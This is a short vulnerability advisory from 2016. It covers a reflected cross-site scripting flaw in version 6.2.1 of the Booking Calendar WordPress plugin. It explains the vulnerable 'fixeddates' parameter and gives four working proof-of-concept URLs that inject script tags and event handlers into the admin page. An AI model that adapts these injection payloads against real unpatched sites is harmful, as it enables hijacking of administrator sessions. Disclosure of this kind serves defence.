Booking Calendar [Reflected XSS]

Description

This is a typical Reflected XSS vulnerability. Vulnerable param is $_REQUEST['*fixeddates']. The param name can be of any value as long it has a fixeddates suffix.

The $_REQUEST['view_mode'] must not be equal to vm_calendar for this attack to work.

PoC

http://sbwp4.dev/wp-admin/admin.php
?page=booking/wpdev-booking.phpwpdev-booking
&view_mode=default
&wpdevbk_idfixeddates="><script>alert(/XSS/)</script>

Using arbitrary charackers as param suffix.

http://sbwp4.dev/wp-admin/admin.php
?page=booking/wpdev-booking.phpwpdev-booking
&view_mode=default
&arbitrary_chars_0039--237651OOOfixeddates="><script>alert(/XSS/)</script>

Using HTML events

http://sbwp4.dev/wp-admin/admin.php
?page=booking/wpdev-booking.phpwpdev-booking
&view_mode=default
&fixeddates="><img src=a onerror=alert(/XSS/) />

http://sbwp4.dev/wp-admin/admin.php
?page=booking/wpdev-booking.phpwpdev-booking
&view_mode=default
&fixeddates=" onmouseover=alert(/XSS/)//

WordPress Plugins Reflected XSS XSS

INFO

25 July 2016
Pan Vag
wpbookingcalendar.com
Booking Calendar
6.2.1
WordPress 4.5.2
DWF-2016-87102